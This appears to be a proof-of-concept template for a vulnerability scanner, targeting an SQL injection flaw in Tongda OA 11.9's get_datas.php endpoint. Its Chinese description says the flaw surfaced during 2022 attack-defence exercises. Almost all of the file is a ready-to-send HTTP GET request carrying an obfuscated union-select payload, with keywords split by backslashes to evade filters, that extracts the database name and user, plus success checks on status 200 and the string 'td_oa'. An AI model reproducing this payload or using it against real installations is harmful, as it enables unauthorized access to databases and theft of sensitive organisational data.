<DudePoc_Name>通达 OA 11.9 get_datas.php前台注入</DudePoc_Name>
<DudePoc_Description>2022攻防演习期间，通达OA被曝存在SQL注入漏洞，攻击者可以利用漏洞直接获取敏感数据。</DudePoc_Description>
<DudePoc_SetHeader>
GET /general/reportshop/utils/get_datas.php?USER_ID=OfficeTask&PASSWORD=&col=1,1&tab=5%20whe\\re%201={`\\=%27`%201}%20un\\ion%20(s\\elect%20database(),%20us\\er())--%20%27 HTTP/1.1
Host: $<AttackHost>$
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.57
</DudePoc_SetHeader>
<DudePoc_SetData>

</DudePoc_SetData>
<DudePoc_VerifyStatusCode>200</DudePoc_VerifyStatusCode>
<DudePoc_VerifyData>td_oa</DudePoc_VerifyData>
<DudePoc_VerifyFile></DudePoc_VerifyFile>
<DudePoc_AttackCode></DudePoc_AttackCode>
